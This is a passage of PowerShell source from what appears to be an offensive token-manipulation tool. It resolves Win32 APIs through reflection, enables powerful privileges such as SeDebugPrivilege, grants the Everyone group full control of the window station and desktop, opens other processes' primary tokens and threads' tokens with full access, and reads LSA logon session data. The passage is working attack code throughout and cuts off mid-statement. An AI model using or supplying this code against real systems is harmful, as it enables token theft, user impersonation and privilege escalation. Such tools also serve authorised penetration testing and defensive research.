[IntPtr], [IntPtr], [IntPtr], [Bool], [UInt32], [IntPtr], [IntPtr], [IntPtr], [IntPtr]) ([Bool]) $CreateProcessAsUserW = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($CreateProcessAsUserWAddr, $CreateProcessAsUserWDelegate) $OpenWindowStationWAddr = Get-ProcAddress user32.dll OpenWindowStationW $OpenWindowStationWDelegate = Get-DelegateType @([IntPtr], [Bool], [UInt32]) ([IntPtr]) $OpenWindowStationW = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($OpenWindowStationWAddr, $OpenWindowStationWDelegate) $OpenDesktopAAddr = Get-ProcAddress user32.dll OpenDesktopA $OpenDesktopADelegate = Get-DelegateType @([String], [UInt32], [Bool], [UInt32]) ([IntPtr]) $OpenDesktopA = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($OpenDesktopAAddr, $OpenDesktopADelegate) $ImpersonateSelfAddr = Get-ProcAddress Advapi32.dll ImpersonateSelf $ImpersonateSelfDelegate = Get-DelegateType @([Int32]) ([Bool]) $ImpersonateSelf = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ImpersonateSelfAddr, $ImpersonateSelfDelegate) $LookupPrivilegeValueAddr = Get-ProcAddress Advapi32.dll LookupPrivilegeValueA $LookupPrivilegeValueDelegate = Get-DelegateType @([String], [String], $LUID.MakeByRefType()) ([Bool]) $LookupPrivilegeValue = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($LookupPrivilegeValueAddr, $LookupPrivilegeValueDelegate) $AdjustTokenPrivilegesAddr = Get-ProcAddress Advapi32.dll AdjustTokenPrivileges $AdjustTokenPrivilegesDelegate = Get-DelegateType @([IntPtr], [Bool], $TOKEN_PRIVILEGES.MakeByRefType(), [UInt32], [IntPtr], [IntPtr]) ([Bool]) $AdjustTokenPrivileges = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($AdjustTokenPrivilegesAddr, $AdjustTokenPrivilegesDelegate) $GetCurrentThreadAddr = Get-ProcAddress kernel32.dll GetCurrentThread $GetCurrentThreadDelegate = Get-DelegateType @() ([IntPtr]) $GetCurrentThread = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GetCurrentThreadAddr, $GetCurrentThreadDelegate) $GetSecurityInfoAddr = Get-ProcAddress advapi32.dll GetSecurityInfo $GetSecurityInfoDelegate = Get-DelegateType @([IntPtr], [UInt32], [UInt32], [IntPtr].MakeByRefType(), [IntPtr].MakeByRefType(), [IntPtr].MakeByRefType(), [IntPtr].MakeByRefType(), [IntPtr].MakeByRefType()) ([UInt32]) $GetSecurityInfo = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GetSecurityInfoAddr, $GetSecurityInfoDelegate) $SetSecurityInfoAddr = Get-ProcAddress advapi32.dll SetSecurityInfo $SetSecurityInfoDelegate = Get-DelegateType @([IntPtr], [UInt32], [UInt32], [IntPtr], [IntPtr], [IntPtr], [IntPtr]) ([UInt32]) $SetSecurityInfo = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($SetSecurityInfoAddr, $SetSecurityInfoDelegate) $GetAceAddr = Get-ProcAddress advapi32.dll GetAce $GetAceDelegate = Get-DelegateType @([IntPtr], [UInt32], [IntPtr].MakeByRefType()) ([IntPtr]) $GetAce = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GetAceAddr, $GetAceDelegate) $LookupAccountSidWAddr = Get-ProcAddress advapi32.dll LookupAccountSidW $LookupAccountSidWDelegate = Get-DelegateType @([IntPtr], [IntPtr], [IntPtr], [UInt32].MakeByRefType(), [IntPtr], [UInt32].MakeByRefType(), [UInt32].MakeByRefType()) ([Bool]) $LookupAccountSidW = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($LookupAccountSidWAddr, $LookupAccountSidWDelegate) $AddAccessAllowedAceAddr = Get-ProcAddress advapi32.dll AddAccessAllowedAce $AddAccessAllowedAceDelegate = Get-DelegateType @([IntPtr], [UInt32], [UInt32], [IntPtr]) ([Bool]) $AddAccessAllowedAce = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($AddAccessAllowedAceAddr, $AddAccessAllowedAceDelegate) $CreateWellKnownSidAddr = Get-ProcAddress advapi32.dll CreateWellKnownSid $CreateWellKnownSidDelegate = Get-DelegateType @([UInt32], [IntPtr], [IntPtr], [UInt32].MakeByRefType()) ([Bool]) $CreateWellKnownSid = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($CreateWellKnownSidAddr, $CreateWellKnownSidDelegate) $SetEntriesInAclWAddr = Get-ProcAddress advapi32.dll SetEntriesInAclW $SetEntriesInAclWDelegate = Get-DelegateType @([UInt32], $EXPLICIT_ACCESS.MakeByRefType(), [IntPtr], [IntPtr].MakeByRefType()) ([UInt32]) $SetEntriesInAclW = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($SetEntriesInAclWAddr, $SetEntriesInAclWDelegate) $LocalFreeAddr = Get-ProcAddress kernel32.dll LocalFree $LocalFreeDelegate = Get-DelegateType @([IntPtr]) ([IntPtr]) $LocalFree = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($LocalFreeAddr, $LocalFreeDelegate) $LookupPrivilegeNameWAddr = Get-ProcAddress advapi32.dll LookupPrivilegeNameW $LookupPrivilegeNameWDelegate = Get-DelegateType @([IntPtr], [IntPtr], [IntPtr], [UInt32].MakeByRefType()) ([Bool]) $LookupPrivilegeNameW = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($LookupPrivilegeNameWAddr, $LookupPrivilegeNameWDelegate) ############################### #Used to add 64bit memory addresses Function Add-SignedIntAsUnsigned { Param( [Parameter(Position = 0, Mandatory = $true)] [Int64] $Value1, [Parameter(Position = 1, Mandatory = $true)] [Int64] $Value2 ) [Byte[]]$Value1Bytes = [BitConverter]::GetBytes($Value1) [Byte[]]$Value2Bytes = [BitConverter]::GetBytes($Value2) [Byte[]]$FinalBytes = [BitConverter]::GetBytes([UInt64]0) if ($Value1Bytes.Count -eq $Value2Bytes.Count) { $CarryOver = 0 for ($i = 0; $i -lt $Value1Bytes.Count; $i++) { #Add bytes [UInt16]$Sum = $Value1Bytes[$i] + $Value2Bytes[$i] + $CarryOver $FinalBytes[$i] = $Sum -band 0x00FF if (($Sum -band 0xFF00) -eq 0x100) { $CarryOver = 1 } else { $CarryOver = 0 } } } else { Throw "Cannot add bytearrays of different sizes" } return [BitConverter]::ToInt64($FinalBytes, 0) } #Enable SeAssignPrimaryTokenPrivilege, needed to query security information for desktop DACL function Enable-SeAssignPrimaryTokenPrivilege { [IntPtr]$ThreadHandle = $GetCurrentThread.Invoke() if ($ThreadHandle -eq [IntPtr]::Zero) { Throw "Unable to get the handle to the current thread" } [IntPtr]$ThreadToken = [IntPtr]::Zero [Bool]$Result = $OpenThreadToken.Invoke($ThreadHandle, $Win32Constants.TOKEN_QUERY -bor $Win32Constants.TOKEN_ADJUST_PRIVILEGES, $false, [Ref]$ThreadToken) $ErrorCode = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error() if ($Result -eq $false) { if ($ErrorCode -eq $Win32Constants.ERROR_NO_TOKEN) { $Result = $ImpersonateSelf.Invoke($Win32Constants.SECURITY_DELEGATION) if ($Result -eq $false) { Throw (New-Object ComponentModel.Win32Exception) } $Result = $OpenThreadToken.Invoke($ThreadHandle, $Win32Constants.TOKEN_QUERY -bor $Win32Constants.TOKEN_ADJUST_PRIVILEGES, $false, [Ref]$ThreadToken) if ($Result -eq $false) { Throw (New-Object ComponentModel.Win32Exception) } } else { Throw ([ComponentModel.Win32Exception] $ErrorCode) } } $CloseHandle.Invoke($ThreadHandle) | Out-Null $LuidSize = [System.Runtime.InteropServices.Marshal]::SizeOf([Type]$LUID) $LuidPtr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($LuidSize) $LuidObject = [System.Runtime.InteropServices.Marshal]::PtrToStructure($LuidPtr, [Type]$LUID) [System.Runtime.InteropServices.Marshal]::FreeHGlobal($LuidPtr) $Result = $LookupPrivilegeValue.Invoke($null, "SeAssignPrimaryTokenPrivilege", [Ref] $LuidObject) if ($Result -eq $false) { Throw (New-Object ComponentModel.Win32Exception) } [UInt32]$LuidAndAttributesSize = [System.Runtime.InteropServices.Marshal]::SizeOf([Type]$LUID_AND_ATTRIBUTES) $LuidAndAttributesPtr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($LuidAndAttributesSize) $LuidAndAttributes = [System.Runtime.InteropServices.Marshal]::PtrToStructure($LuidAndAttributesPtr, [Type]$LUID_AND_ATTRIBUTES) [System.Runtime.InteropServices.Marshal]::FreeHGlobal($LuidAndAttributesPtr) $LuidAndAttributes.Luid = $LuidObject $LuidAndAttributes.Attributes = $Win32Constants.SE_PRIVILEGE_ENABLED [UInt32]$TokenPrivSize = [System.Runtime.InteropServices.Marshal]::SizeOf([Type]$TOKEN_PRIVILEGES) $TokenPrivilegesPtr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($TokenPrivSize) $TokenPrivileges = [System.Runtime.InteropServices.Marshal]::PtrToStructure($TokenPrivilegesPtr, [Type]$TOKEN_PRIVILEGES) [System.Runtime.InteropServices.Marshal]::FreeHGlobal($TokenPrivilegesPtr) $TokenPrivileges.PrivilegeCount = 1 $TokenPrivileges.Privileges = $LuidAndAttributes $Global:TokenPriv = $TokenPrivileges $Result = $AdjustTokenPrivileges.Invoke($ThreadToken, $false, [Ref] $TokenPrivileges, $TokenPrivSize, [IntPtr]::Zero, [IntPtr]::Zero) if ($Result -eq $false) { Throw (New-Object ComponentModel.Win32Exception) } $CloseHandle.Invoke($ThreadToken) | Out-Null } #Enable SeSecurityPrivilege, needed to query security information for desktop DACL function Enable-Privilege { Param( [Parameter()] [ValidateSet("SeAssignPrimaryTokenPrivilege", "SeAuditPrivilege", "SeBackupPrivilege", "SeChangeNotifyPrivilege", "SeCreateGlobalPrivilege", "SeCreatePagefilePrivilege", "SeCreatePermanentPrivilege", "SeCreateSymbolicLinkPrivilege", "SeCreateTokenPrivilege", "SeDebugPrivilege", "SeEnableDelegationPrivilege", "SeImpersonatePrivilege", "SeIncreaseBasePriorityPrivilege", "SeIncreaseQuotaPrivilege", "SeIncreaseWorkingSetPrivilege", "SeLoadDriverPrivilege", "SeLockMemoryPrivilege", "SeMachineAccountPrivilege", "SeManageVolumePrivilege", "SeProfileSingleProcessPrivilege", "SeRelabelPrivilege", "SeRemoteShutdownPrivilege", "SeRestorePrivilege", "SeSecurityPrivilege", "SeShutdownPrivilege", "SeSyncAgentPrivilege", "SeSystemEnvironmentPrivilege", "SeSystemProfilePrivilege", "SeSystemtimePrivilege", "SeTakeOwnershipPrivilege", "SeTcbPrivilege", "SeTimeZonePrivilege", "SeTrustedCredManAccessPrivilege", "SeUndockPrivilege", "SeUnsolicitedInputPrivilege")] [String] $Privilege ) [IntPtr]$ThreadHandle = $GetCurrentThread.Invoke() if ($ThreadHandle -eq [IntPtr]::Zero) { Throw "Unable to get the handle to the current thread" } [IntPtr]$ThreadToken = [IntPtr]::Zero [Bool]$Result = $OpenThreadToken.Invoke($ThreadHandle, $Win32Constants.TOKEN_QUERY -bor $Win32Constants.TOKEN_ADJUST_PRIVILEGES, $false, [Ref]$ThreadToken) $ErrorCode = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error() if ($Result -eq $false) { if ($ErrorCode -eq $Win32Constants.ERROR_NO_TOKEN) { $Result = $ImpersonateSelf.Invoke($Win32Constants.SECURITY_DELEGATION) if ($Result -eq $false) { Throw (New-Object ComponentModel.Win32Exception) } $Result = $OpenThreadToken.Invoke($ThreadHandle, $Win32Constants.TOKEN_QUERY -bor $Win32Constants.TOKEN_ADJUST_PRIVILEGES, $false, [Ref]$ThreadToken) if ($Result -eq $false) { Throw (New-Object ComponentModel.Win32Exception) } } else { Throw ([ComponentModel.Win32Exception] $ErrorCode) } } $CloseHandle.Invoke($ThreadHandle) | Out-Null $LuidSize = [System.Runtime.InteropServices.Marshal]::SizeOf([Type]$LUID) $LuidPtr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($LuidSize) $LuidObject = [System.Runtime.InteropServices.Marshal]::PtrToStructure($LuidPtr, [Type]$LUID) [System.Runtime.InteropServices.Marshal]::FreeHGlobal($LuidPtr) $Result = $LookupPrivilegeValue.Invoke($null, $Privilege, [Ref] $LuidObject) if ($Result -eq $false) { Throw (New-Object ComponentModel.Win32Exception) } [UInt32]$LuidAndAttributesSize = [System.Runtime.InteropServices.Marshal]::SizeOf([Type]$LUID_AND_ATTRIBUTES) $LuidAndAttributesPtr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($LuidAndAttributesSize) $LuidAndAttributes = [System.Runtime.InteropServices.Marshal]::PtrToStructure($LuidAndAttributesPtr, [Type]$LUID_AND_ATTRIBUTES) [System.Runtime.InteropServices.Marshal]::FreeHGlobal($LuidAndAttributesPtr) $LuidAndAttributes.Luid = $LuidObject $LuidAndAttributes.Attributes = $Win32Constants.SE_PRIVILEGE_ENABLED [UInt32]$TokenPrivSize = [System.Runtime.InteropServices.Marshal]::SizeOf([Type]$TOKEN_PRIVILEGES) $TokenPrivilegesPtr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($TokenPrivSize) $TokenPrivileges = [System.Runtime.InteropServices.Marshal]::PtrToStructure($TokenPrivilegesPtr, [Type]$TOKEN_PRIVILEGES) [System.Runtime.InteropServices.Marshal]::FreeHGlobal($TokenPrivilegesPtr) $TokenPrivileges.PrivilegeCount = 1 $TokenPrivileges.Privileges = $LuidAndAttributes $Global:TokenPriv = $TokenPrivileges Write-Verbose "Attempting to enable privilege: $Privilege" $Result = $AdjustTokenPrivileges.Invoke($ThreadToken, $false, [Ref] $TokenPrivileges, $TokenPrivSize, [IntPtr]::Zero, [IntPtr]::Zero) if ($Result -eq $false) { Throw (New-Object ComponentModel.Win32Exception) } $CloseHandle.Invoke($ThreadToken) | Out-Null Write-Verbose "Enabled privilege: $Privilege" } #Change the ACL of the WindowStation and Desktop function Set-DesktopACLs { Enable-Privilege -Privilege SeSecurityPrivilege #Change the privilege for the current window station to allow full privilege for all users $WindowStationStr = [System.Runtime.InteropServices.Marshal]::StringToHGlobalUni("WinSta0") $hWinsta = $OpenWindowStationW.Invoke($WindowStationStr, $false, $Win32Constants.ACCESS_SYSTEM_SECURITY -bor $Win32Constants.READ_CONTROL -bor $Win32Constants.WRITE_DAC) if ($hWinsta -eq [IntPtr]::Zero) { Throw (New-Object ComponentModel.Win32Exception) } Set-DesktopACLToAllowEveryone -hObject $hWinsta $CloseHandle.Invoke($hWinsta) | Out-Null #Change the privilege for the current desktop to allow full privilege for all users $hDesktop = $OpenDesktopA.Invoke("default", 0, $false, $Win32Constants.DESKTOP_GENERIC_ALL -bor $Win32Constants.WRITE_DAC) if ($hDesktop -eq [IntPtr]::Zero) { Throw (New-Object ComponentModel.Win32Exception) } Set-DesktopACLToAllowEveryone -hObject $hDesktop $CloseHandle.Invoke($hDesktop) | Out-Null } function Set-DesktopACLToAllowEveryone { Param( [IntPtr]$hObject ) [IntPtr]$ppSidOwner = [IntPtr]::Zero [IntPtr]$ppsidGroup = [IntPtr]::Zero [IntPtr]$ppDacl = [IntPtr]::Zero [IntPtr]$ppSacl = [IntPtr]::Zero [IntPtr]$ppSecurityDescriptor = [IntPtr]::Zero #0x7 is window station, change for other types $retVal = $GetSecurityInfo.Invoke($hObject, 0x7, $Win32Constants.DACL_SECURITY_INFORMATION, [Ref]$ppSidOwner, [Ref]$ppSidGroup, [Ref]$ppDacl, [Ref]$ppSacl, [Ref]$ppSecurityDescriptor) if ($retVal -ne 0) { Write-Error "Unable to call GetSecurityInfo. ErrorCode: $retVal" } if ($ppDacl -ne [IntPtr]::Zero) { $AclObj = [System.Runtime.InteropServices.Marshal]::PtrToStructure($ppDacl, [Type]$ACL) #Add all users to acl [UInt32]$RealSize = 2000 $pAllUsersSid = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($RealSize) $Success = $CreateWellKnownSid.Invoke(1, [IntPtr]::Zero, $pAllUsersSid, [Ref]$RealSize) if (-not $Success) { Throw (New-Object ComponentModel.Win32Exception) } #For user "Everyone" $TrusteeSize = [System.Runtime.InteropServices.Marshal]::SizeOf([Type]$TRUSTEE) $TrusteePtr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($TrusteeSize) $TrusteeObj = [System.Runtime.InteropServices.Marshal]::PtrToStructure($TrusteePtr, [Type]$TRUSTEE) [System.Runtime.InteropServices.Marshal]::FreeHGlobal($TrusteePtr) $TrusteeObj.pMultipleTrustee = [IntPtr]::Zero $TrusteeObj.MultipleTrusteeOperation = 0 $TrusteeObj.TrusteeForm = $Win32Constants.TRUSTEE_IS_SID $TrusteeObj.TrusteeType = $Win32Constants.TRUSTEE_IS_WELL_KNOWN_GROUP $TrusteeObj.ptstrName = $pAllUsersSid #Give full permission $ExplicitAccessSize = [System.Runtime.InteropServices.Marshal]::SizeOf([Type]$EXPLICIT_ACCESS) $ExplicitAccessPtr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($ExplicitAccessSize) $ExplicitAccess = [System.Runtime.InteropServices.Marshal]::PtrToStructure($ExplicitAccessPtr, [Type]$EXPLICIT_ACCESS) [System.Runtime.InteropServices.Marshal]::FreeHGlobal($ExplicitAccessPtr) $ExplicitAccess.grfAccessPermissions = 0xf03ff $ExplicitAccess.grfAccessMode = $Win32constants.GRANT_ACCESS $ExplicitAccess.grfInheritance = $Win32Constants.OBJECT_INHERIT_ACE $ExplicitAccess.Trustee = $TrusteeObj [IntPtr]$NewDacl = [IntPtr]::Zero $RetVal = $SetEntriesInAclW.Invoke(1, [Ref]$ExplicitAccess, $ppDacl, [Ref]$NewDacl) if ($RetVal -ne 0) { Write-Error "Error calling SetEntriesInAclW: $RetVal" } [System.Runtime.InteropServices.Marshal]::FreeHGlobal($pAllUsersSid) if ($NewDacl -eq [IntPtr]::Zero) { throw "New DACL is null" } #0x7 is window station, change for other types $RetVal = $SetSecurityInfo.Invoke($hObject, 0x7, $Win32Constants.DACL_SECURITY_INFORMATION, $ppSidOwner, $ppSidGroup, $NewDacl, $ppSacl) if ($RetVal -ne 0) { Write-Error "SetSecurityInfo failed. Return value: $RetVal" } $LocalFree.Invoke($ppSecurityDescriptor) | Out-Null } } #Get the primary token for the specified processId function Get-PrimaryToken { Param( [Parameter(Position=0, Mandatory=$true)] [UInt32] $ProcessId, #Open the token with all privileges. Requires SYSTEM because some of the privileges are restricted to SYSTEM. [Parameter()] [Switch] $FullPrivs ) if ($FullPrivs) { $TokenPrivs = $Win32Constants.TOKEN_ALL_ACCESS } else { $TokenPrivs = $Win32Constants.TOKEN_ASSIGN_PRIMARY -bor $Win32Constants.TOKEN_DUPLICATE -bor $Win32Constants.TOKEN_IMPERSONATE -bor $Win32Constants.TOKEN_QUERY } $ReturnStruct = New-Object PSObject $hProcess = $OpenProcess.Invoke($Win32Constants.PROCESS_QUERY_INFORMATION, $true, [UInt32]$ProcessId) $ReturnStruct | Add-Member -MemberType NoteProperty -Name hProcess -Value $hProcess if ($hProcess -eq [IntPtr]::Zero) { #If a process is a protected process it cannot be enumerated. This call should only fail for protected processes. $ErrorCode = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error() Write-Verbose "Failed to open process handle for ProcessId: $ProcessId. ProcessName $((Get-Process -Id $ProcessId).Name). Error code: $ErrorCode . This is likely because this is a protected process." return $null } else { [IntPtr]$hProcToken = [IntPtr]::Zero $Success = $OpenProcessToken.Invoke($hProcess, $TokenPrivs, [Ref]$hProcToken) #Close the handle to hProcess (the process handle) if (-not $CloseHandle.Invoke($hProcess)) { $ErrorCode = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error() Write-Warning "Failed to close process handle, this is unexpected. ErrorCode: $ErrorCode" } $hProcess = [IntPtr]::Zero if ($Success -eq $false -or $hProcToken -eq [IntPtr]::Zero) { $ErrorCode = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error() Write-Warning "Failed to get processes primary token. ProcessId: $ProcessId. ProcessName $((Get-Process -Id $ProcessId).Name). Error: $ErrorCode" return $null } else { $ReturnStruct | Add-Member -MemberType NoteProperty -Name hProcToken -Value $hProcToken } } return $ReturnStruct } function Get-ThreadToken { Param( [Parameter(Position=0, Mandatory=$true)] [UInt32] $ThreadId ) $TokenPrivs = $Win32Constants.TOKEN_ALL_ACCESS $RetStruct = New-Object PSObject [IntPtr]$hThreadToken = [IntPtr]::Zero $hThread = $OpenThread.Invoke($Win32Constants.THREAD_ALL_ACCESS, $false, $ThreadId) if ($hThread -eq [IntPtr]::Zero) { $ErrorCode = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error() if ($ErrorCode -ne $Win32Constants.ERROR_INVALID_PARAMETER) #The thread probably no longer exists { Write-Warning "Failed to open thread handle for ThreadId: $ThreadId. Error code: $ErrorCode" } } else { $Success = $OpenThreadToken.Invoke($hThread, $TokenPrivs, $false, [Ref]$hThreadToken) if (-not $Success) { $ErrorCode = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error() if (($ErrorCode -ne $Win32Constants.ERROR_NO_TOKEN) -and #This error is returned when the thread isn't impersonated ($ErrorCode -ne $Win32Constants.ERROR_INVALID_PARAMETER)) #Probably means the thread was closed { Write-Warning "Failed to call OpenThreadToken for ThreadId: $ThreadId. Error code: $ErrorCode" } } else { if($Instance){ Write-Verbose "$Instance : Successfully queried thread token" }else{ Write-Verbose "Successfully queried thread token" } } #Close the handle to hThread (the thread handle) if (-not $CloseHandle.Invoke($hThread)) { $ErrorCode = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error() Write-Warning "Failed to close thread handle, this is unexpected. ErrorCode: $ErrorCode" } $hThread = [IntPtr]::Zero } $RetStruct | Add-Member -MemberType NoteProperty -Name hThreadToken -Value $hThreadToken return $RetStruct } #Gets important information about the token such as the logon type associated with the logon function Get-TokenInformation { Param( [Parameter(Position=0, Mandatory=$true)] [IntPtr] $hToken ) $ReturnObj = $null $TokenStatsSize = [System.Runtime.InteropServices.Marshal]::SizeOf([Type]$TOKEN_STATISTICS) [IntPtr]$TokenStatsPtr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($TokenStatsSize) [UInt32]$RealSize = 0 $Success = $GetTokenInformation.Invoke($hToken, $TOKEN_INFORMATION_CLASS::TokenStatistics, $TokenStatsPtr, $TokenStatsSize, [Ref]$RealSize) if (-not $Success) { $ErrorCode = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error() Write-Warning "GetTokenInformation failed. Error code: $ErrorCode" } else { $TokenStats = [System.Runtime.InteropServices.Marshal]::PtrToStructure($TokenStatsPtr, [Type]$TOKEN_STATISTICS) #Query LSA to determine what the logontype of the session is that the token corrosponds to, as well as the username/domain of the logon $LuidPtr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal([System.Runtime.InteropServices.Marshal]::SizeOf([Type]$LUID)) [System.Runtime.InteropServices.Marshal]::StructureToPtr($TokenStats.AuthenticationId, $LuidPtr, $false) [IntPtr]$LogonSessionDataPtr = [IntPtr]::Zero $ReturnVal = $LsaGetLogonSessionData.Invoke($LuidPtr, [Ref]$LogonSessionDataPtr) if ($ReturnVal -ne 0 -and $LogonSessionDataPtr -eq [IntPtr]::Zero) { Write-Warning "Call to LsaGetLogonSessionData failed. Error code: $ReturnVal. LogonSessionDataPtr = $LogonSessionDataPtr" } else { $LogonSessionData = [System.Runtime.InteropServices.Marshal]::PtrToStructure($LogonSessionDataPtr, [Type]$SECURITY_LOGON_SESSION_DATA) if ($LogonSessionData.Username.Buffer -ne [IntPtr]::Zero -and $LogonSessionData.LoginDomain.Buffer -ne [IntPtr]::Zero) { #Get the username and domainname associated with the token $Username = [System.Runtime.InteropServices.Marshal]::PtrToStringUni($LogonSessionData.Username.Buffer, $LogonSessionData.Username.Length/2) $Domain = [System.Runtime.InteropServices.Marshal]::PtrToStringUni($LogonSessionData.LoginDomain.Buffer, $LogonSessionData.LoginDomain.Length/2) #If UserName is for the computer account, figure out what account it actually is (SYSTEM, NETWORK SERVICE) #Only do this for the computer account because other accounts return correctly. Also, doing this for a domain account #results in querying the domain controller which is unwanted. if ($Username -ieq "$($env:COMPUTERNAME)`$") { [UInt32]$Size = 100 [UInt32]$NumUsernameChar = $Size / 2 [UInt32]$NumDomainChar = $Size / 2 [UInt32]$SidNameUse = 0 $UsernameBuffer = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($Size) $DomainBuffer = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($Size) $Success = $LookupAccountSidW.Invoke([IntPtr]::Zero, $LogonSessionData.Sid, $UsernameBuffer, [Ref]$NumUsernameChar, $DomainBuffer, [Ref]$NumDomainChar, [Ref]$SidNameUse) if ($Success) { $Username = [System.Runtime.InteropServices.Marshal]::PtrToStringUni($UsernameBuffer) $Domain = [System.Runtime.InteropServices.Marshal]::PtrToStringUni($DomainBuffer) } else { $ErrorCode = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error() Write-Warning "Error calling LookupAccountSidW. Error code: $ErrorCode" } [System.Runtime.InteropServices.Marshal]::FreeHGlobal($UsernameBuffer) $UsernameBuffer = [IntPtr]::Zero [System.Runtime.InteropServices.Marshal]::FreeHGlobal($DomainBuffer) $DomainBuffer = [IntPtr]::Zero } $ReturnObj = New-Object PSObject $ReturnObj | Add-Member -Type NoteProperty -Name Domain -Value $Domain $ReturnObj | Add-Member -Type NoteProperty -Name Username -Value $Username $ReturnObj | Add-Member -Type NoteProperty -Name hToken -Value $hToken $ReturnObj | Add-Member -Type NoteProperty -Name LogonType -Value $LogonSessionData.LogonType #Query additional info about the token such as if it is elevated $ReturnObj | Add-Member -Type NoteProperty -Name IsElevated -Value $false $TokenElevationSize = [System.Runtime.InteropServices.Marshal]::SizeOf([Type]$TOKEN_ELEVATION) $TokenElevationPtr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($TokenElevationSize) [UInt32]$RealSize = 0 $Success = $GetTokenInformation.Invoke($hToken, $TOKEN_INFORMATION_CLASS::TokenElevation, $TokenElevationPtr, $TokenElevationSize, [Ref]$RealSize) if (-not $Success) { $ErrorCode = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error() Write-Warning "GetTokenInformation failed to retrieve TokenElevation status. ErrorCode: $ErrorCode" } else { $TokenElevation = [System.Runtime.InteropServices.Marshal]::PtrToStructure($TokenelevationPtr, [Type]$TOKEN_ELEVATION) if ($TokenElevation.TokenIsElevated -ne 0) { $ReturnObj.IsElevated = $true } } [System.Runtime.InteropServices.Marshal]::FreeHGlobal($TokenElevationPtr) #Query the token type to determine if the token is a primary or impersonation token $ReturnObj | Add-Member -Type NoteProperty -Name TokenType -Value "UnableToRetrieve" [UInt32]$TokenTypeSize = 4 [IntPtr]$TokenTypePtr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($TokenTypeSize) [UInt32]$RealSize = 0 $Success = $GetTokenInformation.Invoke($hToken, $TOKEN_INFORMATION_CLASS::TokenType, $TokenTypePtr, $TokenTypeSize, [Ref]$RealSize) if (-not $Success) { $ErrorCode = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error() Write-Warning "GetTokenInformation failed to retrieve TokenImpersonationLevel status. ErrorCode: $ErrorCode" } else { [UInt32]$TokenType = [System.Runtime.InteropServices.Marshal]::PtrToStructure($TokenTypePtr, [Type][UInt32]) switch($TokenType) { 1 {$ReturnObj.TokenType = "Primary"} 2 {$ReturnObj.TokenType = "Impersonation"} } } [System.Runtime.InteropServices.Marshal]::FreeHGlobal($TokenTypePtr) #Query the impersonation level if the token is an Impersonation token if ($ReturnObj.TokenType -ieq "Impersonation") { $ReturnObj | Add-Member -Type NoteProperty -Name ImpersonationLevel -Value "UnableToRetrieve" [UInt32]$ImpersonationLevelSize = 4 [IntPtr]$ImpersonationLevelPtr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($ImpersonationLevelSize) #sizeof uint32 [UInt32]$RealSize = 0 $Success = $GetTokenInformation.Invoke($hToken, $TOKEN_INFORMATION_CLASS::TokenImpersonationLevel, $ImpersonationLevelPtr, $ImpersonationLevelSize, [Ref]$RealSize) if (-not $Success) { $ErrorCode = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error() Write-Warning "GetTokenInformation failed to retrieve TokenImpersonationLevel status. ErrorCode: $ErrorCode" } else { [UInt32]$ImpersonationLevel = [System.Runtime.InteropServices.Marshal]::PtrToStructure($ImpersonationLevelPtr, [Type][UInt32]) switch ($ImpersonationLevel) { 0 { $ReturnObj.ImpersonationLevel = "SecurityAnonymous" } 1 { $ReturnObj.ImpersonationLevel = "SecurityIdentification" } 2 { $ReturnObj.ImpersonationLevel = "SecurityImpersonation" } 3 { $ReturnObj.ImpersonationLevel = "SecurityDelegation" } } } [System.Runtime.InteropServices.Marshal]::FreeHGlobal($ImpersonationLevelPtr) } #Query the token sessionid $ReturnObj | Add-Member -Type NoteProperty -Name SessionID -Value "Unknown" [UInt32]$TokenSessionIdSize = 4 [IntPtr]$TokenSessionIdPtr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($TokenSessionIdSize) [UInt32]$RealSize = 0 $Success = $GetTokenInformation.Invoke($hToken, $TOKEN_INFORMATION_CLASS::TokenSessionId, $TokenSessionIdPtr, $TokenSessionIdSize, [Ref]$RealSize) if (-not $Success) { $ErrorCode = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error() Write-Warning "GetTokenInformation failed to retrieve Token SessionId. ErrorCode: $ErrorCode" } else { [UInt32]$TokenSessionId = 